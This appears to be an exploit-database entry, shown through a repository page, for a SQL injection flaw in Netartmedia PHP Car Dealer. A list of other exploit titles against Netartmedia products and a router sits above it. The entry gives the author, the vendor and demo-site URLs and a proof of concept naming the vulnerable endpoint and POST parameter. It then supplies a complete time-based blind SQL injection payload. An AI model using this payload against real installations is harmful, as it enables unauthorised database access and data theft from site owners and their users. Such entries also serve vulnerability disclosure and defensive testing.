7bd54d5a91
10 changes to exploits/shellcodes NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow Netartmedia PHP Car Dealer - SQL Injection Netartmedia PHP Real Estate Agency 4.0 - SQL Injection Netartmedia Jobs Portal 6.1 - SQL Injection Netartmedia PHP Dating Site - SQL Injection Netartmedia PHP Business Directory 4.2 - SQL Injection 202CMS v10beta - Multiple SQL Injection PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery Netartmedia Deals Portal - 'Email' SQL Injection
20 lines
No EOL
960 B
Text
20 lines
No EOL
960 B
Text
# Exploit Title: Netartmedia PHP Car Dealer- SQL Injection
|
|
# Date: 19.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://www.netartmedia.net/autodealer/
|
|
# Demo Site: https://www.phpscriptdemos.com/autodealer/
|
|
# Version: Lastest
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
# Description:The PHP Car Dealer script is also using a flexible
|
|
template system - the
|
|
templates can be modified or new ones to be created in order to
|
|
completely customize the website look and feel.
|
|
|
|
----- PoC 1 SQLi -----
|
|
|
|
Request: http://localhost/[PATH]/index.php
|
|
|
|
Parameter features[] (POST)
|
|
|
|
Payload:body_style=&car_make=&car_model=1&condition=&exterior_color=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&fuel_type=&max_mileage=&mod=search&only_pictures=1&order_by=date&price_from=1&price_to=1&search_keyword=&search_type=search_form&transmission=&type=1&year= |